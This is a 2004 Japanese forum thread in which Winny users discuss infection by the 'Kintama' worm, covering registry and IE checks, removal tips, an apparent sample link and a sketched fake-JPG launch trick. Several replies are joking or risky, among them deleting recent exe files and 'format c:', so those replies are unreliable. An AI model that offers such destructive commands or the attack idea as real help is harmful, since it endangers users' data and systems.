909 :[名無し]さん(bin+cue).rar:04/03/16 17:19 ID:INmOIj7+
htmlを踏んでも回避する方法

とりあえずIEのローカルのセキュリティの設定変更してない人多そうなので
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
Flagsの値を10進数で1に変更する
インターネットオプションのセキュリティタブ〜マイコンピュータ〜レベルのカスタマイズ
〜ActiveXコントロールとプラグインを無効にするかダイアログ表示でその都度キャンセルするか

その他のスクリプト関連も自動実行になってるから切ったほうがいい

これですべて防げるかどうかわからないがとりあえずやっとけ
あとjpgを開いただけで感染とかってなんだそりゃ?

910 :[名無し]さん(bin+cue).rar:04/03/16 17:20 ID:KNnYSwgQ
>>901
そうだったのか・・・
どうやら俺の知識が足りなかった模様
exeを触らないことと(おそらく仕掛けられた)フォルダの中身をさわらなければ大丈夫と思ってたけど違うようだ
余計なこと書いてスマソ

911 :[名無し]さん(bin+cue).rar:04/03/16 17:20 ID:Hjg2IYVK
>>903
もともとうpフォルダを登録してたんだけど、そのうpフォルダは
ファイルなし、でもプロパティで調べると容量が2MB近くある。
・・・・かかった?(;´Д`)

びびってUpフォルダを消去してしまったので上で出たnyで検索も
できなくなってしまった・・・。馬鹿ー!!_| ̄|○

912 :896:04/03/16 17:20 ID:a2/LmAe9
>>903

それでも安心できないらすぃ

>>895

ってトラップじゃないよね?やってみても平気かしら?

913 :名無し募集中。。。:04/03/16 17:20 ID:5OQx+Mxu
他スレではられてた
http://www.42ch.net/UploaderSmall/source/1079422241.zip

00043750あたりからがファイル名?かな


914 :861:04/03/16 17:21 ID:jiFkbOtz
感染したようではあるが
まだキンタマ生成してないw

regedit.exeも今のところ問題ない
潜伏期間?

915 :[名無し]さん(bin+cue).rar:04/03/16 17:21 ID:ZdiiB+D9
レジストリエディタの起動方法
ttp://www.rtpro.yamaha.co.jp/RT/FAQ/Windows/regedit-exe.html

916 :[名無し]さん(bin+cue).rar:04/03/16 17:21 ID:INmOIj7+
>>901
モマエ紛らわしいから
確実にやったことを正確にレス汁

917 :[名無し]さん(bin+cue).rar:04/03/16 17:21 ID:c7IOQSYZ
俺のキャッシュはキンタマでぱんぱんだぜ5G超えた

918 :854ですが・・・・:04/03/16 17:22 ID:dYPBVNwM
>>905
やヴぁい場合、nyやめますよ。
DLフォルダみましたが、やヴぁいファイルっぽいのがなかったので、ファイルを取り出してDLフォルダ削除しましたよ。
けど、これって金玉なのかな〜?

919 :[名無し]さん(bin+cue).rar:04/03/16 17:22 ID:8j20CI3B
nyで感染するってことで 祭りムード満載でしたが
ぬるぽ作者も今回の作者も、わすれないでほしい。

nyで違法ファイル垂れ流すより、ずっと重い罪なんだってこと。
捕まったら即実刑です♪

920 :[名無し]さん(bin+cue).rar:04/03/16 17:22 ID:pdWHL6Xa
zip、txt、jpgなんかを無視リストに入れて落とさなければいいんだよね?

921 :[名無し]さん(bin+cue).rar:04/03/16 17:22 ID:Wx1HrFGQ
>>916
俺が解説してやるよ
ファイル名がReadmeと書いてあるアイコンがフォルダのexeをクリックしたって事

922 :[名無し]さん(bin+cue).rar:04/03/16 17:22 ID:jbXu08Da
ここに張ってあるリンクでも感染するかもよ

923 :[名無し]さん(bin+cue).rar:04/03/16 17:22 ID:2hjc3fau
そのうちユーザー名を勝手に無視リストに登録して自分の検索ではファイルが引っかからないようにする亜種とかでそうだよねぇ

924 :[名無し]さん(bin+cue).rar:04/03/16 17:23 ID:7apK52Ys
>>911
勝手に自動作成されるなら
そのうちうpされるんじゃないのか?
一応ノード切断状態にしといて検索をなんどかかけてみれば?

925 :[名無し]さん(bin+cue).rar:04/03/16 17:23 ID:sdAUyO5U
少し早いけど新スレ建ててきます。
それで>>665>>895とこれ追加。

※怖がりな人は念のために以下を実行
1.Upfolder.txtの時刻確認(追加してないのに時間が最近=感染?か、確認)
2.怪しいなら上記駆除方法でwinnyを削除

あと最近はキンタマ単体でなく、.folder組み合わせなどあるので注意?

926 :[名無し]さん(bin+cue).rar:04/03/16 17:24 ID:wO7MsWrO
exe、htmやjpgあたりは、無視リストが基本だろうから、
晒されたやつの実数は、たいしたことないんじゃないの?
ネタでさらしてたやつもいるでしょ?

927 :[名無し]さん(bin+cue).rar:04/03/16 17:25 ID:INmOIj7+
面白がってネタレスするのやめろや
マジで自殺する香具師とか出たらどうすんだよ?
そりゃnyやってて踏んだアフォが悪いんだろうけど
死ぬこたないだろ?

928 :[名無し]さん(bin+cue).rar:04/03/16 17:25 ID:ZdiiB+D9
665の駆除方法は確定じゃないでしょ?・・

929 :[名無し]さん(bin+cue).rar:04/03/16 17:25 ID:/Ip5O9f3
eTrust対応あげ。

930 :[名無し]さん(bin+cue).rar:04/03/16 17:25 ID:EpsmQqL/
>>919
 犯罪者が使うnyにワームしかけても罪なんてほとんどないだろ
むしろ感謝される

931 :[名無し]さん(bin+cue).rar:04/03/16 17:25 ID:Hjg2IYVK
>>924
なるほど・・・(TдT) アリガトウ やってみるよ。
これで出たら((;゚Д゚)ガクガクブルブルだ・・・。

932 :[名無し]さん(bin+cue).rar:04/03/16 17:26 ID:a2/LmAe9
過去スレにあった「感染してるPCはデスクトップに血しぶきみたいなのが表示される」てのはガセ?

933 :[名無し]さん(bin+cue).rar:04/03/16 17:27 ID:9VALRPje
>>925 レジストリに自動起動を追加される場合があるようなのでregedit.exe以外の方法で
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run を確認できればなおよいかと

934 :[名無し]さん(bin+cue).rar:04/03/16 17:27 ID:KNnYSwgQ
今気付いたがjpgだけで感染させられる危険性が出てきたぞ

たとえばキンタマ収集している人のWinnyが(C:\Program Files\Winny\)にあるとする
で、有名な詰め合わせファイル(ファイル詰め合わせAAA.zip)にウィルスが紛れ込んでたとする
そして、解凍してそのまま置いているとする。

すると、多くの収集家のパソコンには(C:\Program Files\Winny\ファイル詰め合わせAAA\ウィルス.exe)
のファイルが存在する場合が多くなる。

そこで、(C:\Program Files\Winny\ファイル詰め合わせAAA\ウィルス.exe)を開くように
設定された中身htmlの偽JPGやHTMLファイルを悪意のある第三者が流せば、
今まで大丈夫と思われてたスクリーンショットJPGすら安心できなくなる

とりあえずwinnyやってる人はexe全部消しといたほうがいいと思う

935 :[名無し]さん(bin+cue).rar:04/03/16 17:27 ID:drho847B
>>932
少々ROMってるが
そんな報告は無い

936 :[名無し]さん(bin+cue).rar:04/03/16 17:28 ID:Wx1HrFGQ
面白いからもっと感染者が増えてから報告しよう

937 :[名無し]さん(bin+cue).rar:04/03/16 17:28 ID:9VALRPje
ああ、msconfigでもいいか

ツーかここにも書いてあるな

Winnyウィルス(通称キンタマ)
http://myui.s53.xrea.com/kin/index.html

938 :[名無し]さん(bin+cue).rar:04/03/16 17:28 ID:HtywG6Wa
WINNYまったくやってない人が感染した場合って・・・
不特定多数にメールを送られる被害だけ??

頼む、教えてくれ!!

939 :[名無し]さん(bin+cue).rar:04/03/16 17:29 ID:XTcWmBWY
今頃知った。
これってny1限定?ny2も?

940 :[名無し]さん(bin+cue).rar:04/03/16 17:29 ID:NMhUXj12
>>911 コマンドプロンプトでそのディレクトリにおりて dir /a
って打ってみ。


…たぶんその2MBはThumbs.dbってやつだと思うんだが…。

941 :[名無し]さん(bin+cue).rar:04/03/16 17:29 ID:fE51ZqG6
ユーザー名を変えるのは、どうしたらいんでしょうか?


942 :[名無し]さん(bin+cue).rar:04/03/16 17:29 ID:IjkyJH9B
>>932たぶんネタ 漏れも感染したけどそんな症状でなかった

943 :[名無し]さん(bin+cue).rar:04/03/16 17:29 ID:8j20CI3B
>>935
すっごくまれに見かけるとかいってたような?
二日で3回とかそんくらい

944 :[名無し]さん(bin+cue).rar:04/03/16 17:30 ID:9VALRPje
>>934 たしかにある がexe全部消したらだめだろw

945 :[名無し]さん(bin+cue).rar:04/03/16 17:30 ID:ocAOtKjT
>939
ny1が原産地?
ny2に拡大中

946 :[名無し]さん(bin+cue).rar:04/03/16 17:30 ID:OOWf/jdd
>>939
両方

947 :[名無し]さん(bin+cue).rar:04/03/16 17:31 ID:a2/LmAe9
あーもう、HDフォーマット、システム再構築すればいいんでしょ!ヽ( `Д´)ノ

948 :[名無し]さん(bin+cue).rar:04/03/16 17:31 ID:Q7TwZDIg
そろそろ字刷れの季節

949 :[名無し]さん(bin+cue).rar:04/03/16 17:31 ID:OOWf/jdd
>>941
悪いことは云わんny切っとけ

950 :[名無し]さん(bin+cue).rar:04/03/16 17:31 ID:RZxphnvA
PCを窓から投げ捨てろ!

951 :934:04/03/16 17:32 ID:KNnYSwgQ
>>944
スマソ
確かに全部exeを消したら困るな

一応書いとくけどWinnyフォルダの中のexeね


952 :[名無し]さん(bin+cue).rar:04/03/16 17:32 ID:9VALRPje
【警報】Winnyを狙ったワーム・ウイルス情報 Part11
http://tmp2.2ch.net/test/read.cgi/download/1079425731/

953 :[名無し]さん(bin+cue).rar:04/03/16 17:32 ID:XSvrXkqp
今回のウイルス作者ってどういう罪に問われるの?


954 :[名無し]さん(bin+cue).rar:04/03/16 17:32 ID:RET8ga1i
>>933
たとえ感染してregeditが使えなくなったとしても、
OSが勝手にバックアップしてるのもあるからできると思う。
c:\windowsのregeditは置き換えられるけど、
system32やServicePackFilesの中のは無事だったから。

955 :[名無し]さん(bin+cue).rar:04/03/16 17:32 ID:8j20CI3B
>>930
大間違い

956 :[名無し]さん(bin+cue).rar:04/03/16 17:32 ID:vZx3vEa8
>>950を窓から投げ捨てたついでに次スレ立ててくれ>>>950のPC

957 :[名無し]さん(bin+cue).rar:04/03/16 17:33 ID:pTJ9/H/d
対処法=ポート0にする

958 :[名無し]さん(bin+cue).rar:04/03/16 17:33 ID:9VALRPje
>>951 感染したらwinnyフォルダ以外にもランダムなファイル名のexeファイルをコピーするようなのでそれではダメな予感

959 :[名無し]さん(bin+cue).rar:04/03/16 17:35 ID:oFJMk15F
潜伏期間とかあるのかこれって

960 :[名無し]さん(bin+cue).rar:04/03/16 17:35 ID:0vhtIT1o
regedit.exe起動したらメモ帳が起動するけど
更新日が1996年だから感染してない?

961 :[名無し]さん(bin+cue).rar:04/03/16 17:35 ID:Q7TwZDIg
C:を*.exeで検索して行進履歴が早いのを削除すればOK?

962 :[名無し]さん(bin+cue).rar:04/03/16 17:37 ID:Wx1HrFGQ
>>960
ok

963 :[名無し]さん(bin+cue).rar:04/03/16 17:37 ID:oWmcAmlP
で推定被害者何名よ?

964 :[名無し]さん(bin+cue).rar:04/03/16 17:37 ID:u4NwzvVQ
>961
やったらWindowsが起動しなくなるかもよ。

965 :[名無し]さん(bin+cue).rar:04/03/16 17:38 ID:OOWf/jdd
>>961
すんばらしい やってみな

966 :[名無し]さん(bin+cue).rar:04/03/16 17:38 ID:vZx3vEa8
>>960
感染してそうだな…
>>961
やってみて報告しれ。

967 :[名無し]さん(bin+cue).rar:04/03/16 17:38 ID:INmOIj7+
さっきからjpg開いただけで感染するとかって言ってる香具師は
既にウィルス感染していてjpgの関連付けが変更されてただけだろ(w

とにかくネタはやめれ

968 :[名無し]さん(bin+cue).rar:04/03/16 17:38 ID:Wx1HrFGQ
format c:でいいじゃん

969 :[名無し]さん(bin+cue).rar:04/03/16 17:39 ID:Q7TwZDIg
ウェーン デフラグ消滅シタヨー

970 : ◆MANIA5FtOI :04/03/16 17:39 ID:lNp9swnd
きんたま(;´Д`)ハァハァ

971 :[名無し]さん(bin+cue).rar:04/03/16 17:39 ID:INmOIj7+
使い古しのネタもやめれ

972 :[名無し]さん(bin+cue).rar:04/03/16 17:39 ID:4ECEcnbk
>>961
頭言い値!
感染してるかどうかはそれでわかるかも!

973 :[名無し]さん(bin+cue).rar:04/03/16 17:40 ID:KNnYSwgQ
>>958
Winnyフォルダ中のexeを全部消しておくというのは
まだ感染していない人への注意ね

感染した人は・・・がんばれ

974 :[名無し]さん(bin+cue).rar:04/03/16 17:41 ID:0vhtIT1o
いやん・・感染してるかも知れないのね・・
じゃ更新日て関係無いのかな・・

975 :[名無し]さん(bin+cue).rar:04/03/16 17:41 ID:HZlHJsqE
アンチウィルスソフトってウィルスに対して常に後手じゃあダメジャン
これで人柱になった人でもう取り返しつかない人とかいるし
この調子でウィルス作られたら明日はわが身だよ

976 :[名無し]さん(bin+cue).rar:04/03/16 17:41 ID:uNOQ43Eq
690 :[名無し]さん(bin+cue).rar :04/03/16 17:39 ID:UJ2uIDaj
俺の元カノに「ウィニーやってる」ってメールが届いたらしい・・・
アウトルックのアドレスあいつだけだったからな・・・_| ̄|○ モウダメポ

977 :[名無し]さん(bin+cue).rar:04/03/16 17:41 ID:OOWf/jdd
>>963
1000ファイルくらいでもとの祭分が7,80
で残りの900のうち重複(キンタマと詰め合わせとか)が結構あるしネタうpもあるから実質100〜150?

978 :[名無し]さん(bin+cue).rar:04/03/16 17:41 ID:9VALRPje
>>973 了解。すまんかった。

もうじき消えるようなのでせっかくだから再掲

とある人が貼った画像

左の特典写真が感染元
真ん中が自動起動一覧
右はプログラムフォルダ内にできた複製 だそうだ

特典写真.exe は一度リネームされてるかも

http://no.m78.com/up/data/u027853.jpg

つーかおっちゃんねるデスクトップばっかだ

979 :[名無し]さん(bin+cue).rar:04/03/16 17:41 ID:drho847B
>>969
おいおいおいおいおい

       どいうこと?

980 :[名無し]さん(bin+cue).rar:04/03/16 17:42 ID:oWmcAmlP
>>975
ナニをいっとるんだお前

981 :[名無し]さん(bin+cue).rar:04/03/16 17:42 ID:0vhtIT1o
>>975
何を今更

982 :977:04/03/16 17:43 ID:OOWf/jdd
あっすばらしくざっくり計算したんで
あとキンタマでWFL回してるんだが感覚的にもっと少ないかな・・・感染者

ゲームなんかのイメージに組み込めばもっと拡大するかも・・・ (((((((( ;゚Д゚)))))))ガクガクブル

983 :[名無し]さん(bin+cue).rar:04/03/16 17:44 ID:OOWf/jdd
>>975
ネタ乙

984 :[名無し]さん(bin+cue).rar:04/03/16 17:44 ID:Rae54Bf+
キンタマグロ動画のプレビューでゲンナリ

985 :[名無し]さん(bin+cue).rar:04/03/16 17:48 ID:Q7TwZDIg
>>979
デフラグが消えてるんだYO!
キンタマノヴァカヤロー!ウエェェェン(つД`)・゚・。・゚゚・*:.。

986 :[名無し]さん(bin+cue).rar:04/03/16 17:50 ID:drho847B
>>985
ありえねええええええええ

987 :[名無し]さん(bin+cue).rar:04/03/16 17:50 ID:OOWf/jdd
デフラグが消滅?なにそれw

988 :[名無し]さん(bin+cue).rar:04/03/16 17:50 ID:4ECEcnbk
デフラグが消滅だとおおおおおおおおおおおおおお

989 :[名無し]さん(bin+cue).rar:04/03/16 17:51 ID:XGGCnc1l
EVAのアメリカの支部が消滅した時みたいだな(w

990 :[名無し]さん(bin+cue).rar:04/03/16 17:51 ID:dYPBVNwM
>>988
キンタマのせいなのか?

991 :[名無し]さん(bin+cue).rar:04/03/16 17:52 ID:drho847B
キンタマ作者って関連スレに居ないわけ無いよな


             気違いってさみしいナ

992 :[名無し]さん(bin+cue).rar:04/03/16 17:52 ID:2oy4IXwT
>>985
レジストリ書き換えちゃうみたいだからそれでかな?


993 :[名無し]さん(bin+cue).rar:04/03/16 17:53 ID:2oy4IXwT
次スレ
http://tmp2.2ch.net/test/read.cgi/download/1079425731/

994 :[名無し]さん(bin+cue).rar:04/03/16 17:53 ID:DtWpsl+/
記念カキコ

995 :[名無し]さん(bin+cue).rar:04/03/16 17:53 ID:Wx1HrFGQ
1000

996 :[名無し]さん(bin+cue).rar:04/03/16 17:53 ID:OOWf/jdd
>>991
元は知らんがイロイロ弄って(そのまま?)再放流してそうなやつはいるな
3種類?くらい流れてるんだろすでに

997 :[名無し]さん(bin+cue).rar:04/03/16 17:53 ID:NIHWCmqv
(・∀・)コンニチハ!!


998 :[名無し]さん(bin+cue).rar:04/03/16 17:53 ID:+1TOT8U/
キンタ麻衣まんせー
ヽ( ´▽`)ノキンタマー

999 :[名無し]さん(bin+cue).rar:04/03/16 17:54 ID:vcYbK+iV
記念かきこ

1000 : :04/03/16 17:54 ID:fOztkWlG
( ´,_ゝ`)( ´,_ゝ`)( ´,_ゝ`)

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

246 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)